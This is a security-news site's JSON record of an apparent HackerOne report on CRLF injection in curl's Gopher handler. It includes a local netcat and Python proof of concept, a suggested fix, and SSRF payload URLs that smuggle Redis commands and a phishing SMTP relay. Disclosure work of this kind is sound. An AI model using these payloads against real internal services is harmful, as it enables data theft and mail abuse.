{"id":35641,"date":"2026-01-14T04:37:46","date_gmt":"2026-01-14T04:37:46","guid":{"rendered":"http:\/\/localhost\/?p=35641"},"modified":"2026-01-14T04:37:46","modified_gmt":"2026-01-14T04:37:46","slug":"curl-gopher-protocol-command-injection-ssrf-smuggling","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35641","title":{"rendered":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-14T10:28:08&#8243;,&#8221;description&#8221;:&#8221;## Summary\\nThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to \\&#8221;smuggle\\&#8221; additional Gopher selectors or arbitrary commands into a single Gopher request. By using `%0d%0a` in the URL, an attacker can break the line-delimited Gopher protocol and force `curl` to send multiple distinct request lines to the server.\\n\\n## Affected Component\\n- **File:** `lib\/gopher.c`\\n- **Function:** `gopher_do`\\n- **Line:** 101\\n- **Vulnerable Code:** `Curl_urldecode` call with `REJECT_ZERO` flag\\n\\n## Vulnerability Details\\n\\n### Root Cause\\nIn `lib\/gopher.c`, the Gopher protocol handler extracts the selector from the URL and decodes it using `Curl_urldecode` with the `REJECT_ZERO` flag:\\n\\n&#8220;`c\\n\/* lib\/gopher.c:101 *\/\\nresult = Curl_urldecode(newp, 0, \\u0026buf_alloc, \\u0026buf_len, REJECT_ZERO);\\n&#8220;`\\n\\nThe `REJECT_ZERO` flag only prevents null bytes (`%00`) from being decoded. All other control characters, including:\\n- Carriage Return (`%0d` \/ `\\\\r`)\\n- Line Feed (`%0a` \/ `\\\\n`)\\n\\nare decoded into the raw buffer `buf_alloc` and subsequently sent to the server.\\n\\n### Attack Mechanism\\nThe Gopher protocol is line-delimited. After decoding the selector, `curl` sends it to the server followed by a hardcoded CRLF:\\n\\n&#8220;`c\\n\/* lib\/gopher.c:110 *\/\\nresult = Curl_xfer_send(data, buf, buf_len, FALSE, \\u0026nwritten);\\n&#8230;\\n\/* lib\/gopher.c:156 *\/\\nresult = Curl_xfer_send(data, \\&#8221;\\\\r\\\\n\\&#8221;, 2, FALSE, \\u0026nwritten);\\n&#8220;`\\n\\nIf an attacker provides a URL like:\\n&#8220;`\\ngopher:\/\/example.com\/1\/selector%0d%0aINJECTED_COMMAND\\n&#8220;`\\n\\nThe resulting network transmission will be:\\n&#8220;`\\nselector\\\\r\\\\n\\nINJECTED_COMMAND\\\\r\\\\n\\n&#8220;`\\n\\nA standard Gopher server processes each line independently, so it will see:\\n1. A request for `selector`\\n2. A second, attacker-controlled request for `INJECTED_COMMAND`\\n\\n## Proof of Concept\\n\\n### Step 1: Start a Listener\\nOpen a terminal and start a netcat listener to observe the raw protocol traffic:\\n\\n&#8220;`bash\\nnc -l -p 7070\\n&#8220;`\\n\\n### Step 2: Execute the Attack\\nIn another terminal, run curl with the malicious Gopher URL:\\n\\n&#8220;`bash\\ncurl -v \\&#8221;gopher:\/\/localhost:7070\/1\/first-command%0d%0asecond-command\\&#8221;\\n&#8220;`\\n\\n### Step 3: Observe the Result\\nIn the netcat listener terminal, you will see two distinct lines:\\n\\n&#8220;`\\nfirst-command\\nsecond-command\\n&#8220;`\\n\\nThis proves that the attacker can inject arbitrary commands into the Gopher protocol stream.\\n\\n### Alternative PoC (Python)\\nYou can also use this Python script to verify:\\n\\n&#8220;`python\\nimport socket\\n\\n# Start a simple Gopher server\\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\ns.bind((&#8216;127.0.0.1&#8217;, 7070))\\ns.listen(1)\\nprint(\\&#8221;Gopher server listening on port 7070&#8230;\\&#8221;)\\n\\nconn, addr = s.accept()\\ndata = conn.recv(1024).decode()\\nprint(\\&#8221;=== Received Data ===\\&#8221;)\\nprint(repr(data))\\nprint(\\&#8221;\\\\n=== Parsed Lines ===\\&#8221;)\\nfor line in data.split(&#8216;\\\\r\\\\n&#8217;):\\n    if line:\\n        print(f\\&#8221;Command: {line}\\&#8221;)\\nconn.close()\\ns.close()\\n&#8220;`\\n\\nRun this script, then execute:\\n&#8220;`bash\\ncurl \\&#8221;gopher:\/\/localhost:7070\/1\/legitimate%0d%0ainjected%0d%0amalicious\\&#8221;\\n&#8220;`\\n\\nExpected output:\\n&#8220;`\\n=== Received Data ===\\n&#8217;legitimate\\\\r\\\\ninjected\\\\r\\\\nmalicious\\\\r\\\\n&#8217;\\n\\n=== Parsed Lines ===\\nCommand: legitimate\\nCommand: injected\\nCommand: malicious\\n&#8220;`\\n\\n## Impact\\n\\n### SSRF Enhancement\\nThis vulnerability significantly enhances Server-Side Request Forgery (SSRF) attacks. If a web application allows users to provide a URL that is fetched by `curl`, an attacker can:\\n\\n1. **Smuggle commands to internal Gopher servers**\\n   &#8211; Send multiple queries in a single request\\n   &#8211; Bypass rate limiting or logging mechanisms\\n\\n2. **Communicate with other line-delimited internal services**\\n   &#8211; Redis (if accessible via Gopher port or through port confusion)\\n   &#8211; SMTP servers\\n   &#8211; Memcached\\n   &#8211; Custom internal protocols\\n\\n3. **Bypass security controls**\\n   &#8211; WAFs that only inspect the URL path\\n   &#8211; Logging systems that record only the initial request\\n\\n### Attack Scenarios\\n\\n**Scenario 1: Redis Command Injection**\\n&#8220;`\\ngopher:\/\/internal-redis:6379\/1\/SET%20key%20value%0d%0aGET%20sensitive_data\\n&#8220;`\\n\\n**Scenario 2: SMTP Relay**\\n&#8220;`\\ngopher:\/\/mail-server:25\/1\/MAIL%20FROM:\\u003cattacker@evil.com\\u003e%0d%0aRCPT%20TO:\\u003cvictim@target.com\\u003e%0d%0aDATA%0d%0aSubject:%20Phishing\\n&#8220;`\\n\\n## Recommendation\\n\\n### Fix\\nUpdate `lib\/gopher.c` to use `REJECT_CTRL` or `REJECT_CTRL_ZERO` instead of `REJECT_ZERO` in the `Curl_urldecode` call:\\n\\n&#8220;`c\\n\/* lib\/gopher.c:101 &#8211; FIXED *\/\\nresult = Curl_urldecode(newp, 0, \\u0026buf_alloc, \\u0026buf_len, REJECT_CTRL);\\n&#8220;`\\n\\nThis will prevent the decoding of newlines and other control characters that can be used to manipulate the protocol stream.\\n\\n### Verification\\nAfter applying the fix, the PoC should fail with an error indicating that control characters are not allowed in the URL.&#8221;,&#8221;published&#8221;:&#8221;2026-01-13T13:16:23&#8243;,&#8221;modified&#8221;:&#8221;2026-01-14T09:32:16&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: Gopher Protocol Command Injection (SSRF Smuggling)&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3508785&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3508785&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-14T10:28:08&#8243;,&#8221;description&#8221;:&#8221;## Summary\\nThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to \\&#8221;smuggle\\&#8221; additional&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35641","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35641\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-14T10:28:08&#8243;,&#8221;description&#8221;:&#8221;## SummarynThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to &#8221;smuggle&#8221; additional...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35641\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-14T04:37:46+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785\",\"datePublished\":\"2026-01-14T04:37:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641\"},\"wordCount\":893,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"hackerone\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35641#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641\",\"name\":\"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-14T04:37:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35641\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35641#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35641","og_locale":"en_US","og_type":"article","og_title":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-14T10:28:08&#8243;,&#8221;description&#8221;:&#8221;## SummarynThe `curl` Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to &#8221;smuggle&#8221; additional...","og_url":"https:\/\/zero.redgem.net\/?p=35641","og_site_name":"zero redgem","article_published_time":"2026-01-14T04:37:46+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35641#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35641"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785","datePublished":"2026-01-14T04:37:46+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35641"},"wordCount":893,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","hackerone","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35641#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35641","url":"https:\/\/zero.redgem.net\/?p=35641","name":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-14T04:37:46+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35641#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35641"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35641#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: Gopher Protocol Command Injection (SSRF Smuggling)_H1:3508785"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35641"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35641\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}